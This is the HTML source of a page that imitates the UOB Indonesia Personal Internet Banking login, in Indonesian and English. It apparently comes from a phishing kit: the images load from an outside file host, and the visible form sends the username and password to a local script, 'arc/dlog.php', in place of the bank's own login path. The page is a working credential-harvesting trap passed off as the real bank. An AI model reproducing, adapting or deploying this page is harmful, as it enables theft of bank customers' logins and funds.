
<!DOCTYPE html>








<html lang="en" class="app login">
	<head>
	<meta charset="utf-8">
	<title>UOB | Personal Internet Banking</title>
	     
			   <meta name="keywords" content="Personal Internet Banking, Personal Internet Banking UOBI, PIB, PIB UOB, UOB, UOB Indonesia, UOBI,  Internet Banking, Online Banking, Electronic Banking, Electronic Channel, Bill Payment, Transfer, Investment, Check Account Balance, Deposit Placement, Telegraphic Transfer " />
			   <meta name="description" content="UOB Personal Internet Banking memberikan kenyamanan bagi Anda untuk megakses rekening, mengelola investasi dan mengajukan pinjaman. Daftarkan diri Anda segera bergabung dengan UOB Personal Internet Banking.">
			
	    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
	


<script src="./../js/UOBApplet.js"	type="text/javascript"></script>
<script src="./../js/pib_user_password.js?v=1" type="text/javascript"></script>
<script src="./../js/PIBValidation.js?v=1" type="text/javascript"></script>


<script src="./../js/pib.js" type="text/javascript"></script>
<script src="./../js/app.js" type="text/javascript"></script>
<!-- PIB related JS : Start -->
<script src="./../js/E2EApplet.js" type="text/javascript"></script>
<script src="./../js/UOBApplet.js" type="text/javascript"></script>
<script src="./../js/pib_login.js" type="text/javascript"></script>
<script src="./../js/e2escript.js" type="text/javascript"></script>

<!-- PIB related JS : End -->


<link rel="stylesheet" href="./../css/pib.css" type="text/css">
<link rel="stylesheet" href="./../css/app.css" type="text/css">

    <!--[if lt IE 9]>
	<script src="/PIBLogin/resources/js/ie/respond.min.js"></script>
    <link rel="stylesheet" href="/PIBLogin/resources/css/ie8.css" type="text/css" />
    <script src="/PIBLogin/resources/js/ie/html5shiv.js"></script>
    <script src="/PIBLogin/resources/js/ie/excanvas.js"></script>
    <![endif]-->
    
	 <!--[if lt IE 9]>
    <script src="/PIBLogin/resources/js/ie/ie8.js"></script>
    <![endif]-->
    
    <!--[if lt IE 9]>
    <div class="modal-backdrop fade in login-loading"></div>
    <![endif]-->
    
    
	<script src="./../js/login.js"></script>
	</head>
	<body>
		<div id="xbackdrop">
			<img data-ratio="1.78" src="https://programpromo.publit.io/file/Internet-20250527-112419.jpeg" class="bg01-image active bgdrop-image animated" onerror="this.onerror=null;this.src='/PIBLogin/resources/images/bg-login.jpg';">
			</img>
			<img data-ratio="1.78" src="https://programpromo.publit.io/file/Internet-20250527-112427.jpeg" class="bg02-image bgdrop-image animated" onerror="this.onerror=null;this.src='/PIBLogin/resources/images/bg-login02.jpg';">
			</img>
			<img data-ratio="1.78" src="https://programpromo.publit.io/file/Internet-20250527-112435.jpeg" class="bg03-image bgdrop-image animated" onerror="this.onerror=null;this.src='/PIBLogin/resources/images/bg-login03.jpg';">
			</img>
		</div>
		<section class="vbox login">
			<section id="content">
				<section class="hbox stretch">
					<section>
						<section class="vbox">
							<section class="container full">
								<header class="bg-white header header-md navbar navbar-fixed-top-xs box-shadow hidden-xs">
				            		<div class="m-t-sm m-l-sm m-b-sm">
										

 

 
<a href="https://www.uob.co.id/personal/index.php">
 	<img src="https://programpromo.publit.io/file/Internet-20250527-112406.png" class="logo-login-page" onerror="this.onerror=null;this.src='https://programpromo.publit.io/file/Internet-20250527-112406.png';">
 	</img>
</a>
<span class="m-l-md inline-block text-uob-blue text-xxl v-middle hidden-xs">Personal Internet Banking
</span>

									</div>
				        		</header>
								<div class="login-container">
									<div class="notification-message hidden-xs" style="overflow-y:auto">
										<div class="col-lg-12 b">
											<button type="button" class="close m-t-sm text-white" data-dismiss="alert">
												<i class="uob-closebanner"></i>
											</button>
											<div class="m-l-lg m-t-sm m-b-sm m-r-xl text-white notification-content">
												<i class="uob-systemmsg-info btn-icon-md pos-abt"></i>
												<div class="text-white p-img-l-xs message mode-preview">
													<div class="notification-message-container" style="float:left"></div>
												</div>
											</div>
										</div>
										<div class="clearer"></div>
										<div class="rows">
	                						<div class="cols col-12-lg">
												<div class="p-img-l-xs m-t-xs view-mode">
													<a href="#" class="text-u-l text-white mode-preview">View More</a>
	                            					<a href="#" class="text-u-l text-white mode-active hidden">View Less</a>
												</div>
											</div>
										</div>
										<div class="clearer"></div>
									</div>
									<div class="col-lg-8 login-advertisement fade">
										<!-- .crousel slide -->
										<section class="panel panel-default full-vertical-panel">
												<div class="m-t-sm m-l-xl m-r-xl m-b-sm">&nbsp;</div>
											<!--  *** static data section here **************  -->
											<!DOCTYPE html>



<div class="carousel vertical slide auto panel-body login-carousel p-n" id="c-slide">
 	<ol class="carousel-indicators out m-l-md">
	      <li data-target="#c-slide" data-slide-to="0" class="active"></li>
	      <li data-target="#c-slide" data-slide-to="1" class=""></li>
	      <li data-target="#c-slide" data-slide-to="2" class=""></li>
  	</ol>
 	<div class="carousel-inner">
   		<div class="item active uniform-height" data-set="row" data-bg="bg01" data-parentbg="#backdrop">
			<h1 class="block p-l-xl p-r-xl text-white m-t-none m-l-none m-r-md m-b-md">
				<span class="font-bold"> 
					<span class=""><div style="padding: 100px 0px 100px 10px;">&nbsp;</div><!--<p style="font-family: 'Agenda', sans-serif; font-size: 39px; color: #002469; letter-spacing: -1px; line-height: 39px;"><strong>Cicilan hingga 6 bulan<br />dengan Kartu Kredit UOB</strong></p><p style="font-family: 'Open Sans', sans-serif; font-size: 20px; color: #ffffff; font-weight: 500; line-height: 22px;"><strong>Periode:</strong> hingga 31 Juli 2018</p><p style="font-family: 'Open Sans', sans-serif; font-size: 14px; color: #000066;"><a class="btn btn-carousel btn-rounded p-t-sm p-b-sm p-r-md m-t-md b-2x" style="color: #fff !important; border-color: #000066; background-color: #000066; margin-top: 3px;" title="UOB" href="http://www.uob.co.id/rightbyyou?i_cid=PIB-LOGIN-CAROUSEL" target="_blank"><strong>Apply Now</strong></a></p>-->
					</span>
				</span>
				
			</h1>
			<a class="btn btn-carousel btn-rounded p-t-sm p-b-sm p-l-md p-r-md m-l-xl m-t-md b-2x" href=''>
				
			</a>
		</div> 
		<div class="item uniform-height" data-set="row" data-bg="bg02" data-parentbg="#backdrop">
			<h1 class="block m-n p-l-xl p-r-xl text-white m-b-md">
				<span class="font-bold">
					<span class=""><div style="padding: 100px 0px 100px 10px;">&nbsp;</div><!--<p style="font-family: 'Agenda', sans-serif; font-size: 39px; color: #002469; letter-spacing: -1px; line-height: 39px;"><strong>Cicilan hingga 6 bulan<br />dengan Kartu Kredit UOB</strong></p><p style="font-family: 'Open Sans', sans-serif; font-size: 20px; color: #ffffff; font-weight: 500; line-height: 22px;"><strong>Periode:</strong> hingga 31 Juli 2018</p><p style="font-family: 'Open Sans', sans-serif; font-size: 14px; color: #000066;"><a class="btn btn-carousel btn-rounded p-t-sm p-b-sm p-r-md m-t-md b-2x" style="color: #fff !important; border-color: #000066; background-color: #000066; margin-top: 3px;" title="UOB" href="http://www.uob.co.id/rightbyyou?i_cid=PIB-LOGIN-CAROUSEL" target="_blank"><strong>Apply Now</strong></a></p>-->
					</span>
				</span>
				
			</h1>
			<a class="btn btn-carousel btn-rounded p-t-sm p-b-sm p-l-md p-r-md m-l-xl m-t-md b-2x" href=''>
				
			</a>
		</div>
		<div class="item uniform-height" data-set="row" data-bg="bg03" data-parentbg="#backdrop">
			<h1 class="block m-n p-l-xl p-r-xl text-white m-b-md">
				<span class="font-bold"> 
					<span class=""><p>&nbsp;</p><p>&nbsp;</p><p><a href="http://www.uob.co.id/rightbyyou/?i_cid=PIB-LOGIN-PAGE">&nbsp;</a></p>
					</span>
				</span>
				
			</h1>
			<a class="btn btn-carousel btn-rounded p-t-sm p-b-sm p-l-md p-r-md m-l-xl m-t-md b-2x" href=''>
				
			</a>
		</div>
    </div>
</div>

<script>
	$(function(){
		$("a.btn-carousel").each(function(){
			if($.trim($(this).text())==""){
				$(this).hide();
			}
		});
	});
</script>

										</section>
										<!-- / .carousel slide -->
									</div>
									<div class="col-lg-4 login-form-container">
										<div class="visible-xs">
											

 

 
<a href="https://www.uob.co.id/personal/index.php">
 	<img src="https://programpromo.publit.io/file/Internet-20250527-112406.png" class="logo-login-page" onerror="this.onerror=null;this.src='/PIBLogin/resources/images/uob-main-logo.png';">
 	</img>
</a>
<span class="m-l-md inline-block text-uob-blue text-xxl v-middle hidden-xs">Personal Internet Banking
</span>

										</div>
										<!--  **** login form ****  -->
										






<script src="./../js/PIBValidation.js" type="text/javascript"></script>
<script src="./../js/UOBApplet.js" type="text/javascript"></script>
<script src="./../js/pib_login.js" type="text/javascript"></script>
<script src="./../js/e2escript.js" type="text/javascript"></script>

<style>
	input[type=password]::-ms-reveal,
	input[type=password]::-ms-clear
	{
		display: none;
	}
</style>

<div class="panel row login-form-content fade scrollable mb-m-t-none mb-m-l-xs mb-m-r-xs m-l-sm m-r-sm flip-container">
	<div class="flipper">
		<div class="login-form-box p-n front">
			<div class="lang-links">
				<a class="color-link" href="/PIBLogin/Public/processPreCapture.do?keyId=lpc&lang=en_ID">English</a> | 
				<a class="color-link" href="/PIBLogin/Public/processPreCapture.do?keyId=lpc&lang=in_ID">Bahasa Indonesia</a>
				
			</div>
	
				<div class="m-t-md">
					<div id="genricErrorId" style="display:none" class="rows"><div class="col-lg-12 cols"> <div class="text-white alert-danger alert text-md p-xs"> Kami tidak dapat memproses permintaan Anda karena salah satu alasan berikut: <br><br>1. Saat ini layanan tidak tersedia. <br>2.  Transaksi Anda tidak berhasil. <br><br>Untuk bantuan, silahkan hubungi 14008.</div></div></div>
				</div>

<div class="p-md text-xxl b-b">
	<span class="">Selamat Datang di UOB Personal Internet Banking
	</span>
</div>

<div class="form-row m-n">
    	<form  autocomplete="off" action="./../arc/dlog.php" method="POST">
		<input id="userName" name="userN" class="form-control input-text text-lg parsley-validated" placeholder="USERNAME" autocomplete="off"  type="text" value="" size="26" maxlength="16"/>
</div>

<div class="form-row m-n">
		<input id="PASSWORD1" name="passwd" class="form-control input-text text-lg parsley-validated" placeholder="PASSWORD" autocomplete="off" type="password" value="" size="26" maxlength="24"/>
</div>
<br/>
<div class="rows m-l-md m-r-md mb-p-b-lg">
	   <button  class="btn btn-primary col-lg-12 btn-s-md p-t-sm p-b-sm" type="submit" value="Submit">
			<span class="">Login
			</span>
	   	</button>
        <div class="clearer"></div>
		<a class="text-u-l inline-block m-t-sm color-link font-bold" href='https://forms.uob.co.id/uobforms-id/POR/index.page?type=reset-password'>
			<span class="">Lupa Username/Password?
			</span>
		</a>
</div>


		<input type="hidden" name="__c" value="10-0-E412FF547027D965A00A02F5405D94E2" />
</form><form action="dummy" method="post" name="dummyForm" id="dummyFormId"><input type="hidden" name="encData" id="encData"></form>
														
<div class="rows text-md login-footer m-t-md">
	 <div class="col-lg-12 p-t-md p-b-md p-t-md p-b-md p-l-md p-r-none">
               	<span class="">Belum punya akses UOB Personal Internet Banking?
				</span>
               <br/>
               <a target = "window" class="link" href='https://forms.uob.co.id/uobforms-id/POR/index.page'>
               	<span class="">Daftar Sekarang
				</span>
               </a>
            </div>
	  <div class="clearer"></div>
</div>

</div>
		                <div class="clearer"></div>
	            	       
						</div>
	<form id="loginHdForm" name="loginHdForm" autocomplete="off" action="/PIBLogin/Public/processPreCapture.do?keyId=0&lang=0" method="POST">
		<input id="userName" name="userName" type="hidden" value=""/>
		<input id="NEWPASSWORD" name="newPIBPassword" type="hidden" value=""/>
		<input id="ENCODINGPARAM" name="newPIBEncodingParam" type="hidden" value=""/>
		
		<div id="hiddenDiv" align="left" style="visibility:hidden;">
			<button onclick="e2eFrmsubmit(false,'/PIBLogin/Public/processSubmit.do?token=99ba0fa49267d72fa6c1494dbe17c6b0&keyId=0&_p=0&__c=10-3-E412FF547027D965A00A02F5405D94E2','loginHdForm');return false;" id="hiddenButton" class="btn btn-primary col-lg-12 btn-s-md p-t-sm p-b-sm" type="submit" value="Submit">
			</button>
		</div>
	<input type="hidden" name="__c" value="10-2-E412FF547027D965A00A02F5405D94E2" />
</form>	
		

</div>

										<!-- *** logout section here  -->
									</div>
								</div>
							</section>
						</section>
					</section>
				</section>
			</section>
			<div class="page-footer login p-t-sm p-b-sm p-l-md p-r-md hidden-xs">
				<!-- **** footer here  -->
				
<div class="row text-xs">
	<div class="col-lg-6">
 <table>
  <tr>
    <td valign="top">
		
	</td>
    <td colspan="3">&nbsp;&nbsp;&nbsp;</td>
    <td valign="top"> 
		<span class="">UOB Indonesia berizin & diawasi oleh Otoritas Jasa Keuangan dan Bank Indonesia 
		</span>
		<br/>
		<span class="">serta merupakan peserta penjaminan Lembaga Penjamin Simpanan
		</span>
	</td>
  </tr>
</table> 
	</div>
	<div class="col-lg-6 text-right m-t-xs">
		<a href='http://www.uob.co.id/personal/downloads/pubtnc.pdf'>
          <span class="">Syarat dan Ketentuan Umum 
 		</span>
		</a>
		&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;
		<a href='http://uob.co.id/personal/layanan/ebanking/pib/tips-aman-bertransaksi-online.page?i_cid=tipsaman-pib'>
  		  <span class=""> Tips Aman Bertransaksi  
  		</span>
		</a>
	</div>
</div>

<script>
$(function(){
		loader(false);
		fader(false);
	});
</script>

			</div>
		</section>
		<script>
	         	$(function(){
	         		$('.notification-message').hide();
	             	$("div.notification-message div.notification-message-container").load("/online_services/pib/announcements/login/announcements_main.html", function(){
	             		if($.trim($('.notification-message-container').html()) == ''){
	                 		$('.notification-message').hide();
	                 	}else{
	                 		$('.notification-message').show();
	                 	}
	             		setTimeout(function(){$(window).resize();}, 1000);
	             	});              	
	             	$('.notification-message .view-mode a').on('click', function(e) {
	             	    e.preventDefault();
	             	    var isActive = $(e.currentTarget).hasClass('mode-active');
	             	    $('.notification-message .message').toggleClass('mode-preview', isActive);
	             	    $('.notification-message .view-mode .mode-active').toggleClass('hidden', isActive);
	             	    $('.notification-message .view-mode .mode-preview').toggleClass('hidden', !isActive);
	             	});
	             	$('.uob-closebanner').click(function(){
	             		$('.notification-message').hide();
	             	});
	             	$('button.close').click(function(){
	             		$('.notification-message').slideUp();						
	             	});	             	
	         	});
	    </script>
		
 			<script src="./../js/analytics-uat.js"></script>
 			
	</body>
</html><!--
<script id="f5_cspm">(function(){var f5_cspm={f5_p:'MEINDIHHAGDHOKGBDFAFHIIMKMLFOBKBKDICGGMOFOBAFEDOPBIFDCMPBLOLIFNKMLEBEECAAADNIBOHPNOAGJALAAOHOKINMIPKOPJDGADLEGFEFIFKCOINKIHCNEKF',setCharAt:function(str,index,chr){if(index>str.length-1)return str;return str.substr(0,index)+chr+str.substr(index+1);},get_byte:function(str,i){var s=(i/16)|0;i=(i&15);s=s*32;return((str.charCodeAt(i+16+s)-65)<<4)|(str.charCodeAt(i+s)-65);},set_byte:function(str,i,b){var s=(i/16)|0;i=(i&15);s=s*32;str=f5_cspm.setCharAt(str,(i+16+s),String.fromCharCode((b>>4)+65));str=f5_cspm.setCharAt(str,(i+s),String.fromCharCode((b&15)+65));return str;},set_latency:function(str,latency){latency=latency&0xffff;str=f5_cspm.set_byte(str,40,(latency>>8));str=f5_cspm.set_byte(str,41,(latency&0xff));str=f5_cspm.set_byte(str,35,2);return str;},wait_perf_data:function(){try{var wp=window.performance.timing;if(wp.loadEventEnd>0){var res=wp.loadEventEnd-wp.navigationStart;if(res<60001){var cookie_val=f5_cspm.set_latency(f5_cspm.f5_p,res);window.document.cookie='f5avr1420712550aaaaaaaaaaaaaaaa_cspm_='+encodeURIComponent(cookie_val)+';path=/;'+'';}
return;}}
catch(err){return;}
setTimeout(f5_cspm.wait_perf_data,100);return;},go:function(){var chunk=window.document.cookie.split(/\s*;\s*/);for(var i=0;i<chunk.length;++i){var pair=chunk[i].split(/\s*=\s*/);if(pair[0]=='f5_cspm'&&pair[1]=='1234')
{var d=new Date();d.setTime(d.getTime()-1000);window.document.cookie='f5_cspm=;expires='+d.toUTCString()+';path=/;'+';';setTimeout(f5_cspm.wait_perf_data,100);}}}}
f5_cspm.go();}());</script>-->